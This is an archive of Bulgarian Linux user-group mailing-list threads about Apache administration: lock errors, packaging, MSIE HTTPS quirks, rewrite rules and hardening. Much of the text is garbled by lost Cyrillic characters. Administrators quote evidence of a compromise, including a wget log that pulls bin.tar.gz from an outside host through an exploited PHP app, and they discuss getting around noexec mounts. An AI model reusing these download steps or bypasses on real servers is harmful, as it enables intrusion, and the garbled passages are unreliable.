On Wednesday 05 October 2005 09:48, [EMAIL PROTECTED] wrote: Здравейте, Един апах 2.0.51 на една федора 2 се излага...:) това е засега с което разполагам: [Tue Oct 04 23:32:13 2005] [crit] (28)No space left on device: mod_rewrite: could not create rewrite_log_lock Configuration Failed [Tue Oct 04 23:43:53 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:43:53 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:43:53 2005] [notice] Digest: done [Tue Oct 04 23:43:53 2005] [notice] mod_python: Creating 32 session mutexes based on 250 max processes and 0 max threads. [Tue Oct 04 23:43:53 2005] [error] (28)No space left on device: mod_python: Failed to create global mutex 0 of 32 (/tmp/mpmt$Configuration Failed [Tue Oct 04 23:47:18 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Tue Oct 04 23:47:18 2005] [notice] Digest: generating secret for digest authentication ... [Tue Oct 04 23:47:18 2005] [notice] Digest: done [Tue Oct 04 23:47:18 2005] [emerg] (28)No space left on device: Couldn't create accept lock местенце си има: Filesystem 1K-blocks Used Available Use% Mounted on /dev/hda5 8064304321340 708 5% / /dev/hda11 13260 60495 18% /boot none225584 0225584 0% /dev/shm /dev/hda8 49541932 6357072 40668280 14% /home /dev/hda7 1035692 32832950248 4% /tmp /dev/hda3 8064304 1712932 5941716 23% /usr /dev/hda2 8064304 2106988 5547660 28% /var Я погледни `ipcs -s`. Дали имаш семафорки изтекли? Като ги махнеш (скриптче лесно се пише) - ще тръгне всичко (до следващото изтичане). После я провери дали не си с mod_python 3.1 - ако си - ясен е проблема - или се върни на 3.0, или мини нагоре, или го махни ако не го ползваш. Лично аз на Fedora си компилирам Apache/MySQL/PHP и т.н. на ръка, само с това, което ползвам. -- Cyberly yours, Petar Nedyalkov Devoted Orbitel Fan :-) PGP ID: 7AE45436 PGP Public Key: http://bu.orbitel.bg/pgp/bu.asc PGP Fingerprint: 7923 8D52 B145 02E8 6F63 8BDA 2D3F 7C0B 7AE4 5436 pgpzhPQaGf3jv.pgp Description: PGP signature
Re: lug-bg: apache ili ...?
niama nujda da kompilirash na ryka vyv Fedora Core :) Gospod e dal SRPM (Source RPM). Do rychnite deistvia pribiagvai kato te ostavi gadjeto. - Original Message - From: Petar Nedyalkov [EMAIL PROTECTED] To: lug-bg@linux-bulgaria.org Sent: Wednesday, October 05, 2005 10:25 AM Subject: Re: lug-bg: apache ili ...?
Re: lug-bg: apache ili ...?
On Wednesday 05 October 2005 10:43, Teodor Georgiev wrote: niama nujda da kompilirash na ryka vyv Fedora Core :) Gospod e dal SRPM (Source RPM). Има нужда. Особено ако знаеш точно какво искаш. Нали разбираш, че като излезе някоя нова версия на каквото и да е, докато влезе в repository минава време, т.е. или трябва сам да си пиша .spec, или да чакам и да редактирам .spec, премахвайки излишни неща или слагайки липсващи такива, точно защото държа да ползвам оптимално приложенията, а не всички екстри накуп. И си представи ако си правил тези операции много пъти, дали е по-лесно да си ги компилираш на ръка, или да чакаш, или да губиш излишно време. За мен избора е повече от ясен. Do rychnite deistvia pribiagvai kato te ostavi gadjeto. В кръга на шегата: на теб гаджето ли ти прави build-ва пакетите от SRPM ;-) - Original Message - From: Petar Nedyalkov [EMAIL PROTECTED] To: lug-bg@linux-bulgaria.org Sent: Wednesday, October 05, 2005 10:25 AM Subject: Re: lug-bg: apache ili ...? -- Cyberly yours, Petar Nedyalkov Devoted Orbitel Fan :-) PGP ID: 7AE45436 PGP Public Key: http://bu.orbitel.bg/pgp/bu.asc PGP Fingerprint: 7923 8D52 B145 02E8 6F63 8BDA 2D3F 7C0B 7AE4 5436 pgpaI94Jo6U2o.pgp Description: PGP signature
Re: lug-bg: apache ili ...?
On Wed, Oct 05, 2005 at 11:10:28AM +0300, Petar Nedyalkov wrote: On Wednesday 05 October 2005 10:43, Teodor Georgiev wrote: niama nujda da kompilirash na ryka vyv Fedora Core :) Gospod e dal SRPM (Source RPM). Има нужда. Особено ако знаеш точно какво искаш. Нали разбираш, че като излезе някоя нова версия на каквото и да е, докато влезе в repository минава време, т.е. или трябва сам да си пиша .spec, или да чакам и да редактирам .spec, премахвайки излишни неща или слагайки липсващи такива, точно защото държа да ползвам оптимално приложенията, а не всички екстри накуп. И си представи ако си правил тези операции много пъти, дали е по-лесно да си ги компилираш на ръка, или да чакаш, или да губиш излишно време. За мен избора е повече от ясен. Уф... И е така, и не е така... В един момент осъзнаваш, че половиният час (почти никога не е повече), който ще прекараш в разглеждане на променените неща при всяка нова версия, се изплаща и още как, когато можеш безпроблемно да си ползваш package management системата за следене на всички неща, които *също* трябва да провериш дали не трябва да бъдат пипнати... и всички неща, които всъщност *не* трябва да бъдат пипани. Демек, ако излезе нова версия на Apache, съвсем спокойно може да се окаже, че всъщност *няма* нужда да rebuild-ваш и mod_php, и mod_perl, и какво ли не още, и че старите им пакети си работят идеално с новия пакет на Apache - и това ще ти спести време :) Но пак може би говоря очевидни неща - може би просто трябва да ти дам още малко време сам да си стигнеш до тези изводи ;) Do rychnite deistvia pribiagvai kato te ostavi gadjeto. В кръга на шегата: на теб гаджето ли ти прави build-ва пакетите от SRPM ;-) Адаш, внимавай в какво се забъркваш - предста'аш ли си сега той да вземе да отговори ами да :P Поздрави, Петър -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 If there were no counterfactuals, this sentence would not have been paradoxical. pgpJ9ce4G1WTX.pgp Description: PGP signature
Re: lug-bg: apache ili ...?
On Wednesday 05 October 2005 11:47, Peter Pentchev wrote: On Wed, Oct 05, 2005 at 11:10:28AM +0300, Petar Nedyalkov wrote: On Wednesday 05 October 2005 10:43, Teodor Georgiev wrote: niama nujda da kompilirash na ryka vyv Fedora Core :) Gospod e dal SRPM (Source RPM). Има нужда. Особено ако знаеш точно какво искаш. Нали разбираш, че като излезе някоя нова версия на каквото и да е, докато влезе в repository минава време, т.е. или трябва сам да си пиша .spec, или да чакам и да редактирам .spec, премахвайки излишни неща или слагайки липсващи такива, точно защото държа да ползвам оптимално приложенията, а не всички екстри накуп. И си представи ако си правил тези операции много пъти, дали е по-лесно да си ги компилираш на ръка, или да чакаш, или да губиш излишно време. За мен избора е повече от ясен. Уф... И е така, и не е така... В един момент осъзнаваш, че половиният час (почти никога не е повече), който ще прекараш в разглеждане на променените неща при всяка нова версия, се изплаща и още как, когато можеш безпроблемно да си ползваш package management системата за следене на всички неща, които *също* трябва да провериш дали не трябва да бъдат пипнати... и всички неща, които всъщност *не* трябва да бъдат пипани. Демек, ако излезе нова версия на Apache, Тук ако говорим за моя случай, който описах в отговора ми към Сава - ще видиш, че няма преразход на време - иначе ясно, че е по-добре да има dependencies. съвсем спокойно може да се окаже, че всъщност *няма* нужда да rebuild-ваш и mod_php, и mod_perl, и какво ли не още, и че старите им пакети си работят идеално с новия пакет на Apache - и това ще ти спести време :) Но пак може би говоря очевидни неща - може би просто трябва да ти дам още малко време сам да си стигнеш до тези изводи ;) Е, разбира се, че няма как да се отрече написаното. Аз и затова казах, че прекрасно се възползвам от пакетните системи. Но нали знаеш, че то е в графата по принцип общовалидни, а тя не е като винаги валидни, т.е. има единични изключения. Споделих, как ми е най-добре според собствените нужди все пак - нека не забравяме, че не съм казал всички трябва да правите като мен :-) Do rychnite deistvia pribiagvai kato te ostavi gadjeto. В кръга на шегата: на теб гаджето ли ти прави build-ва пакетите от SRPM ;-) Адаш, внимавай в какво се забъркваш - предста'аш ли си сега той да вземе да отговори ами да :P Няма, няма, знам го аз ;-) Поздрави, Петър -- Cyberly yours, Petar Nedyalkov Devoted Orbitel Fan :-) PGP ID: 7AE45436 PGP Public Key: http://bu.orbitel.bg/pgp/bu.asc PGP Fingerprint: 7923 8D52 B145 02E8 6F63 8BDA 2D3F 7C0B 7AE4 5436 pgp4gKn6OiVQ9.pgp Description: PGP signature
lug-bg: Apache traffic limiting
Application layer-.- 2.0.52. ,bw_mod-0.5 ., , . (). .30 !3 /24 706 . . Vhosters, -classful queing . SEGFAULT.? qdisc-a . -- Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache HTTPS MSIE
, ( ) : https- 1.0 . TUX ( )( 8080 ). . ( ,, ) :) HTTP 1.1, keepalive :) --- Hristo Chernev - -! ! : http://www.jnn-marketing.com/e-GovernmentBG.htm A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: apache HTTPS MSIE
Zdravejte, imam izkluchitelno seriozen problem sas MSIE i HTTPS. chesto dava page cannot be displayed i sled refresh se zarejda na Linux servera polzvan Apache 2.0.52 i openssl-0.9.7d . Tova e shiroko diskutoran problem i se dalji na bug vav MSIE obache 90/100 ot horata pozvat MSIE osobenno izvan BG :( no ne namiram fix ( nezavisimo free ili ne ... niama znachenie ) az v momebnta polzvam za https zaiavkite SetEnvIf User-Agent .*MSIE.* \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 i raboti stabilno no bavno , no tova kakto razborate ne e reshenie. Molbata mi e ako nikoj se e boril s problema ( ili e popadnal na info ) za reshenie koeto dava azmojnost da se vkluchi HTTP 1.1 da pishe izpraven sam pred varianta za zamenia Linux web server sas IIS samo zastoto ne podarja HTTP 1.1 ( ili ne moje da sepodkara stabilno ) kam MSIE po https. servera e dosta natovaren s nad 1 300 000 requesta na den. Pozdravi Emo A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache HTTPS MSIE
emo terziev wrote: Zdravejte, imam izkluchitelno seriozen problem sas MSIE i HTTPS. chesto dava page cannot be displayed i sled refresh se zarejda na Linux servera polzvan Apache 2.0.52 i openssl-0.9.7d . Tova e shiroko diskutoran problem i se dalji na bug vav MSIE obache 90/100 ot horata pozvat MSIE osobenno izvan BG :( no ne namiram fix ( nezavisimo free ili ne ... niama znachenie ) az v momebnta polzvam za https zaiavkite SetEnvIf User-Agent .*MSIE.* \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 i raboti stabilno no bavno , no tova kakto razborate ne e reshenie. Molbata mi e ako nikoj se e boril s problema ( ili e popadnal na info ) za reshenie koeto dava azmojnost da se vkluchi HTTP 1.1 da pishe izpraven sam pred varianta za zamenia Linux web server sas IIS samo zastoto ne podarja HTTP 1.1 ( ili ne moje da sepodkara stabilno ) kam MSIE po https. servera e dosta natovaren s nad 1 300 000 requesta na den. IIS, . , , ? .., . -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache HTTPS MSIE
.MSIE . .. , ... . On Fri, 11 Feb 2005 21:06:00 +0200, Georgi Chorbadzhiyski [EMAIL PROTECTED] wrote: emo terziev wrote: Zdravejte, imam izkluchitelno seriozen problem sas MSIE i HTTPS. chesto dava page cannot be displayed i sled refresh se zarejda na Linux servera polzvan Apache 2.0.52 i openssl-0.9.7d . Tova e shiroko diskutoran problem i se dalji na bug vav MSIE obache 90/100 ot horata pozvat MSIE osobenno izvan BG :( no ne namiram fix ( nezavisimo free ili ne ... niama znachenie ) az v momebnta polzvam za https zaiavkite SetEnvIf User-Agent .*MSIE.* \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 i raboti stabilno no bavno , no tova kakto razborate ne e reshenie. Molbata mi e ako nikoj se e boril s problema ( ili e popadnal na info ) za reshenie koeto dava azmojnost da se vkluchi HTTP 1.1 da pishe izpraven sam pred varianta za zamenia Linux web server sas IIS samo zastoto ne podarja HTTP 1.1 ( ili ne moje da sepodkara stabilno ) kam MSIE po https. servera e dosta natovaren s nad 1 300 000 requesta na den. IIS, . , , ? .., . -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache rewrite rule
, Rewrite: RewriteEngine on RewriteRule http://www.namebg.com/(.*) http://www.name.com/$1 [L,PT] RewriteRule http://www.namebg.biz/(.*) http://www.name.com/$1 [L,PT] 10x ps. vagnoto e v address bara obache da se poiaviama samo name.com nezavisimo dali se iska namebg.biz ili ne6to drugo. mislia che mai tova pravi rewrite.popravete me ako gresha sorry la latinnicata -- www.mail.bg mail.bg : - - 30MB - 1GB SMS 2 - SMS( ) - WAP GSM - POP3 - __ http://www.mail.bg A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache rewrite rule
On Wed, Feb 09, 2005 at 02:15:49PM +0200, [EMAIL PROTECTED] wrote: , Rewrite: RewriteEngine on RewriteRule http://www.namebg.com/(.*) http://www.name.com/$1 [L,PT] RewriteRule http://www.namebg.biz/(.*) http://www.name.com/$1 [L,PT] 10x ps. vagnoto e v address bara obache da se poiaviama samo name.com nezavisimo dali se iska namebg.biz ili ne6to drugo. mislia che mai tova pravi rewrite.popravete me ako gresha , RewriteHTTP redirect ( 302, - redirect={permanent,temp,seeother}), URL- address bar- , . , -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 Thit sentence is not self-referential because thit is not a word. pgpF2G81djV4a.pgp Description: PGP signature
Re: lug-bg: apache rewrite rule
Peter Pentchev wrote: On Wed, Feb 09, 2005 at 02:15:49PM +0200, [EMAIL PROTECTED] wrote: , Rewrite: RewriteEngine on RewriteRule http://www.namebg.com/(.*) http://www.name.com/$1 [L,PT] RewriteRule http://www.namebg.biz/(.*) http://www.name.com/$1 [L,PT] 10x ps. vagnoto e v address bara obache da se poiaviama samo name.com nezavisimo dali se iska namebg.biz ili ne6to drugo. mislia che mai tova pravi rewrite.popravete me ako gresha , RewriteHTTP redirect ( 302, - redirect={permanent,temp,seeother}), URL- address bar- , . [L, PT] HTTP redirect, , alias-, ScriptAlias- .. ,e [R] redirect|R [=code]' (force redirect) Prefix Substitution with http://thishost[:thisport]/ (which makes the new URL a URI) to force a external redirection. If no code is given a HTTP response of 302 (MOVED TEMPORARILY) is used. If you want to use other response codes in the range 300-400 just specify them as a number or use one of the following symbolic names: temp (default), permanent, seeother. Use it for rules which should canonicalize the URL and give it back to the client, e.g., translate ``/~'' into ``/u/'' or always append a slash to /u/user, etc. Note: When you use this flag, make sure that the substitution field is a valid URL! If not, you are redirecting to an invalid location! And remember that this flag itself only prefixes the URL with http://thishost[:thisport]/, rewriting continues. Usually you also want to stop and do the redirection immediately. To stop the rewriting you also have to provide the 'L' flag. -- Sava Chankov research and development http://www.blueboard.biz A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache rewrite rule
On Wed, Feb 09, 2005 at 03:23:10PM +0200, Marian Marinov wrote: ! ... top-post- ? :) ! -VirtualHost : Redirect / http://name.com -, -, - - . http://namebg.biz/foo/bar ? , http://name.bg/foo/bar, 404- :) ...Rewrite redirect...Rewrite Redirect Rewrite-a. ,, - , - :) , [cut] , Rewrite: RewriteEngine on RewriteRule http://www.namebg.com/(.*) http://www.name.com/$1 [L,PT] RewriteRule http://www.namebg.biz/(.*) http://www.name.com/$1 [L,PT] 10x ps. vagnoto e v address bara obache da se poiaviama samo name.com nezavisimo dali se iska namebg.biz ili ne6to drugo. mislia che mai tova pravi rewrite.popravete me ako gresha sorry la latinnicata [cut] -- Peter Pentchev [EMAIL PROTECTED][EMAIL PROTECTED][EMAIL PROTECTED] PGP key:http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence no verb. pgptPdBdFSXpt.pgp Description: PGP signature
lug-bg: apache rewrite rule
, Apache Rewriting Guide , . - request namebg.com OR namebg.biz OR www.namebg.biz www.name.com - Frank Teen! ! ! : http://www.az-jenata.com/frank A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache rewrite rule
Redirect , Rewrite: RewriteEngine on RewriteRule http://www.namebg.com/(.*) http://www.name.com/$1 [L,PT] RewriteRule http://www.namebg.biz/(.*) http://www.name.com/$1 [L,PT] . 09 2005 08:57 .. Iantcho Vassilev : , Apache Rewriting Guide , . - request namebg.com OR namebg.biz OR www.namebg.biz www.name.com - Frank Teen! ! ! : http://www.az-jenata.com/frank === = A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html === = -- One Planet, One Internet. We Are All Connected. Registered Linux User #309995 at http://counter.li.org A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
On , 2005-01-20 at 23:12 +0200, Nikola Antonov wrote: On Thursday 20 January 2005 19:54, Peter Georgiev wrote: . - php . , . . , -. ,, ... - /tmp noexec. , . /tmp . /dev/vg2/tmp on /tmp type reiserfs (rw,noexec,nosuid,nodev,noatime) , don't be afraid to be paranoid :) signature.asc Description: This is a digitally signed message part
Re: lug-bg: apache strange process
Vasil Kolev wrote: On , 2005-01-20 at 23:12 +0200, Nikola Antonov wrote: On Thursday 20 January 2005 19:54, Peter Georgiev wrote: . - php . , . . , -. ,, ... - /tmp noexec. , . /tmp . /dev/vg2/tmp on /tmp type reiserfs (rw,noexec,nosuid,nodev,noatime) , don't be afraid to be paranoid :) - nosuid,nodev noexec. , noexec perl python. 2.6 /lib/ld.so program . -- Georgi Chorbadzhiyski http://georgi.unixsol.org/ A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
Georgi Chorbadzhiyski wrote: Vasil Kolev wrote: On , 2005-01-20 at 23:12 +0200, Nikola Antonov wrote: On Thursday 20 January 2005 19:54, Peter Georgiev wrote: . - php . , . . , -. ,, ... - /tmp noexec. , . /tmp . /dev/vg2/tmp on /tmp type reiserfs (rw,noexec,nosuid,nodev,noatime) , don't be afraid to be paranoid :) - nosuid,nodev noexec. , noexec perl python. 2.6 /lib/ld.so program . noexec : result from `mount`: /dev/hda3 on /web type reiserfs (rw,noexec,nosuid) hosting:/web# echo 'echo test' test.sh hosting:/web# chmod 755 test.sh hosting:/web# ./test.sh -su: ./test.sh: Permission denied hosting:/web# sh test.sh test hosting:/web# phpBB , . , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
Milen Trifonov wrote: ps xauf : apache6635 0.0 0.2 1356 312 ?S02:26 0:00 ./xfs apache 15480 0.0 0.2 1352 308 ?S05:23 0:00 ./31338 /var/tmp. . ? . : ps xauwwwfe - 31338 xfs : strace -p 15480 // ... , . P.s. chkrootkit about :) , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
Danail Petrov wrote: Georgi Chorbadzhiyski wrote: Vasil Kolev wrote: On , 2005-01-20 at 23:12 +0200, Nikola Antonov wrote: On Thursday 20 January 2005 19:54, Peter Georgiev wrote: . - php . , . . , -. ,, ... - /tmp noexec. , . /tmp . /dev/vg2/tmp on /tmp type reiserfs (rw,noexec,nosuid,nodev,noatime) , don't be afraid to be paranoid :) - nosuid,nodev noexec. , noexec perl python. 2.6 /lib/ld.so program . noexec : result from `mount`: /dev/hda3 on /web type reiserfs (rw,noexec,nosuid) hosting:/web# echo 'echo test' test.sh hosting:/web# chmod 755 test.sh hosting:/web# ./test.sh -su: ./test.sh: Permission denied hosting:/web# sh test.sh test hosting:/web# phpBB , . , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html [EMAIL PROTECTED]:/srv$ mount | grep srv /dev/mapper/vg0-srv on /srv type reiserfs (rw,noexec,nosuid,nodev) [EMAIL PROTECTED]:/srv$ pwd /srv [EMAIL PROTECTED]:/srv$ ls uname www [EMAIL PROTECTED]:/srv$ ./uname -r bash: ./uname: Permission denied [EMAIL PROTECTED]:/srv$ /lib/ld-linux.so.2 ./uname -r ./uname: error while loading shared libraries: ./uname: failed to map segment from shared object: Operation not permitted [EMAIL PROTECTED]:/srv$ pomaga, zashto da ne pomaga noexec, samo che tvoq primer e sus shell script. ot man mount: noexec - Do not allow execution of any binaries on the mounted file system. pozdravi, Georgi Alexandrov P.S. nqmam vuzmojnost v momenta za kirilica :-) A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
lug-bg: apache strange process
ps xauf : apache6635 0.0 0.2 1356 312 ?S02:26 0:00 ./xfs apache 15480 0.0 0.2 1352 308 ?S05:23 0:00 ./31338 /var/tmp. . ? -- Milen Trifonov [EMAIL PROTECTED] A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
On Thu, 20 Jan 2005 19:21:51 +0200; Milen Trifonov wrote: ps xauf : apache6635 0.0 0.2 1356 312 ?S02:26 0:00 ./xfs apache 15480 0.0 0.2 1352 308 ?S05:23 0:00 ./31338 /var/tmp. . ? -- Milen Trifonov [EMAIL PROTECTED] . - php . , . . , -. ,, ... A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
Re: lug-bg: apache strange process
On Thursday 20 January 2005 19:54, Peter Georgiev wrote: . - php . , . . , -. ,, ... - /tmp noexec. , . /tmp . -- Nikola ANTONOV, Sofia, Bulgaria 4 Dragan Tsankov blvd., 1000 Bulgarian National Radio -- http://linux-bg.org http://mirrors.logos-bg.net http://debianbookbg.org -- Public GnuPG key at http://wwwkeys.pgp.net http://ftp.logos-bg.net/pub/Linux-BG.org/GPG_Keys/ Fingerprint: AD64 2468 0AB4 B298 E7E3 92DA 15F5 7AC5 A05E 0F63 -- pgpJpPJtSK8df.pgp Description: PGP signature
Re: lug-bg: Apache + chroot + many vdomains
https://savannah.nongnu.org/projects/util-vserver/ http://freshmeat.net/redir/util-vserver/51531/url_homepage/util-vserver util-vserver is a Linux virtual server utility framework, allowing an administrator to set up multiple, isolated virtual servers. It can be used to run various services securely separated, without requiring special configuration. Virtual servers are unable to interact with each other, or the main server. Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 default index.html.. ,1 , ... . .php ( 'eXoops'): --13:44:45-- http://dhaenk.port5.com/bin.tar.gz = `bin.tar.gz' Resolving dhaenk.port5.com... done. Connecting to dhaenk.port5.com[212.15.85.21]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,153,967 [application/x-tar] 0K .. .. .. .. .. 4% 14.48 KB/s 50K .. .. .. .. .. 8% 12.15 KB/s 100K .. .. .. .. .. 13% 9.07 KB/s 150K .. .. .. .. .. 17% 11.07 KB/s 200K .. .. .. .. .. 22% 10.29 KB/s 250K .. .. .. .. .. 26% 14.41 KB/s 300K .. .. .. .. .. 31% 9.25 KB/s 350K .. .. .. .. .. 35% 7.07 KB/s 400K .. .. .. .. .. 39% 13.14 KB/s 450K .. .. .. .. .. 44% 10.39 KB/s 500K .. .. .. .. .. 48% 7.16 KB/s 550K .. .. .. .. .. 53% 10.24 KB/s 600K .. .. .. .. .. 57% 10.99 KB/s 650K .. .. .. .. .. 62% 12.40 KB/s 700K .. .. .. .. .. 66% 6.04 KB/s 750K .. .. .. .. .. 70% 16.13 KB/s 800K .. .. .. .. .. 75% 8.19 KB/s 850K .. .. .. .. .. 79% 8.18 KB/s 900K .. .. .. .. .. 84% 6.03 KB/s 950K .. .. .. .. .. 88% 11.16 KB/s 1000K .. .. .. .. .. 93% 27.44 KB/s 1050K .. .. .. .. .. 97% 16.55 KB/s 1100K .. .. .. 100% 8.34 KB/s 13:46:37 (10.07 KB/s) - `bin.tar.gz' saved [1153967/1153967] == Fakename: /usr/sbin/httpd PidNum: 12821 [Tue Dec 21 20:01:50 2004] [notice] SIGHUP received. Attempting to restart [Tue Dec 21 20:01:59 2004] [notice] Digest: generating secret for digest authentication ... [Tue Dec 21 20:01:59 2004] [notice] Digest: done [Tue Dec 21 20:11:39 2004] [notice] Apache/2.0.40 (Red Hat Linux) configured -- resuming normal operations [Tue Dec 21 20:11:39 2004] [info] Server built: Feb 25 2003 05:01:56 [Tue Dec 21 20:11:39 2004] [debug] /usr/src/build/228504-i386/BUILD/httpd-2.0.40/server/mpm/prefork/prefork.c(1039): AcceptMutex: sysvsem (default: sysvsem) String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. String found where operator expected at m1ho2of line 2, near $ts[int(rand(@ts))] . ' (Might be a runaway multi-line '' string starting on line 1) (Missing semicolon on previous line?) syntax error at m1ho2of line 2, near $ts[int(rand(@ts))] . ' Bad name after D' at m1ho2of line 2. [--cut--] shell.php :) ( ) ...,... , . , A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers). http://www.linux-bulgaria.org - Hosted by
Re: lug-bg: Apache + chroot + many vdomains
http://www.linux-vserver.org/ Linux-VServer allows you to create virtual private servers and security contexts which operate like a normal Linux server, but allow many independent servers to be run simultaneously in one box at full speed. All services, such as ssh, mail, Web, and databases, can be started on such a VPS, without modification, just like on any real server. Each virtual server has its own user account database and root password and doesn't interfere with other virtual servers. Danail Petrov wrote: , , apache ( ) /fakeroot , /fakeroot ? apache, : This site is defaced!!! NeverEverNo Sanity WebWorm generation 18 default index.html.. ,1 , ... . .php ( 'eXoops'): --13:44:45-- http://dhaenk.port5.com/bin.tar.gz = `bin.tar.gz' Resolving dhaenk.port5.com... done. Connecting to dhaenk.port5.com[212.15.85.21]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1,153,967 [application/x-tar] 0K .. .. .. .. .. 4% 14.48 KB/s 50K .. .. .. .. .. 8% 12.15 KB/s 100K .. .. .. .. .. 13% 9.07 KB/s 150K .. .. .. .. .. 17% 11.07 KB/s 200K .. .. .. .. .. 22% 10.29 KB/s 250K .. .. .. .. .. 26% 14.41 KB/s 300K .. .. .. .. .. 31% 9.25 KB/s 350K .. .. .. .. .. 35% 7.07 KB/s 400K .. .. .. .. .. 39% 13.14 KB/s 450K .. .. .. .. .. 44% 10.39 KB/s 500K .. .. .. .. .. 48% 7.16 KB/s 550K .. .. .. .. .. 53% 10.24 KB/s 600K .. .. .. .. .. 57% 10.99 KB/s 650K .. .. .. .. .. 62% 12.40 KB/s 700K .. .. .. .. .. 66% 6.04 KB/s 750K .. .. .. .. .. 70% 16.13 KB/s 800K .. .. .. .. .. 75% 8.19 KB/s 850K .. .. .. .. .. 79% 8.18 KB/s 900K .. .. .. .. .. 84% 6.03 KB/s 950K .. .. .. .. .. 88% 11.16 KB/s 1000K .. .. .. .. .. 93% 27.44 KB/s 1050K .. .. .. .. .. 97% 16.55 KB/s 